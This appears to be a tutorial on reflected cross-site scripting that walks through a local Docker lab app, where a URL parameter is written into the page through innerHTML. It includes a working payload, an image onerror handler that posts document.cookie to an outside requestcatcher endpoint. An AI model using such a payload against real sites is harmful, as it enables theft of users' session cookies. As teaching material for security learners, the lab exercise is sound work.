Reflected-XSS Attacks
In this article you will learn about Reflected-XSS attacks.
What are Reflected-XSS attacks?
Reflected-XSS (Reflected Cross Site Scripting) attacks are XSS attacks, which means that they involve injecting custom Javascript code into a website page.
They differ from Self-XSS attacks since Reflected-XSS can be triggered without the user needing to input the code directly in the page, which makes them several times more dangerous than the former.
Usually, this kind of attacks is triggered by tricking the user into visiting a certain malicious link. Malicious not because the website is "naturally" malicious, but because some part of the URL triggers the execution of malicious code in the target page.
To understand better how this works let's have a look into this example challenge.
To start the app you can run docker compose up
Exploiting the application
When we visit http://localhost:8080 we come across the following page:
When we input something in the box and click the button we can see that the url changes, the page refreshes and the text below the title is updated:
If we check the source we see that the page links a main.js script:
By visiting it we can see that it sets the innerHTML of the description element to the value of the description search parameter.
Let's try changing the parameter in the url to include an HTML element:
We can see that http://localhost:8080/?description=%3Cinput%2F%3E rendered the input field!
We can use the same payloads we used in the Self-XSS article to execute javascript in the page and send the cookies to our requestcatcher endpoint too:
<img onerror="fetch('https://learncyber.requestcatcher.com/cookies', {method: 'POST', body: document.cookie})" src=""/>
Being the final URL:
All an attacker needs to do is give this URL to a victim and the victim will send their cookies to the attacker, as we can see here:
That's it for Reflected-XSS attacks! Remember you can always try and test new payloads with this application if you feel like practicing!
Table of Contents